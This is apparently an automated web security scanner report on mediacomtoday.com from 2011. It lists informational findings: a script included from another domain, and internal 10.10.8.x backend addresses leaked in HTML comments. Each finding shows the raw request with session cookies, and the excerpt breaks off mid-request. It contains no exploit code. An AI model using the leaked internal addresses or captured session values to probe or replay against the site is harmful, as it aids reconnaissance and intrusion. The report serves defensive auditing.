Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?inc=31 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=30
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313397325261; dslv=1313397325261; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 09:04:19 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 132302
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;f8d7f329;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...

4.12. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?inc=25 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=24
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313386850394; dslv=1313386850394; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 06:09:12 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 133594
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;278980e0;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...

4.13. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?inc=15 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313369396056; dslv=1313369396057; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 01:18:04 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135202
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;26003a9d;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...

4.14. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?inc=4 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313350190874; dslv=1313350190875; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 19:58:35 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135560
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;1c34b7b2;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...

5. Private IP addresses disclosed  previous
There are 10 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


5.1. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /index.php?inc=23 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=22
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313383360709; dslv=1313383360710; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 05:11:09 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 134146
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- VHOST: mediacomtoday.com on 10.10.8.132 -->
...[SNIP]...

5.2. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /index.php?inc=11 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=10
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313362413862; dslv=1313362413863; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 23:22:12 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 134989
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- VHOST: mediacomtoday.com on 10.10.8.152 -->
...[SNIP]...

5.3. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /index.php?inc=9 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313358923545; dslv=1313358923546; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 22:24:04 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 134998
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- VHOST: mediacomtoday.com on 10.10.8.182 -->
...[SNIP]...

5.4. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /index.php?inc=1 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_cc=true; s_nr=1313344950958; dslv=1313344950990; dslv_s=First%20Visit; s_vnum=1315936950998%26vn%3D1; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 18:31:18 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135453
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- VHOST: mediacomtoday.com on 10.10.8.122 -->
...[SNIP]...

5.5. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /index.php?inc=8 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313357176985; dslv=1313357176986; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 21:54:58 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135724
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- VHOST: mediacomtoday.com on 10.10.8.172 -->
...[SNIP]...

5.6. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /index.php?inc=5 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313351937705; dslv=1313351937706; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 20:27:41 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 134998
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- VHOST: mediacomtoday.com on 10.10.8.162 -->
...[SNIP]...

5.7. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /index.php?inc=6 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313353684303; dslv=1313353684303; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 20:56:47 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 134951
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- VHOST: mediacomtoday.com on 10.10.8.202 -->
...[SNIP]...

5.8. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /index.php?inc=13 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313365903940; dslv=1313365903941; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 00:20:07 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135073
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- VHOST: mediacomtoday.com on 10.10.8.232 -->
...[SNIP]...

5.9. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /index.php?inc=2 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313346697417; dslv=1313346697418; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 19:00:24 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135429
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<!-- VHOST: mediacomtoday.com on 10.10.8.112 -->
...[SNIP]...

5.10. http://www.mediacomtoday.com/index.php  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /index.php?inc=4 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
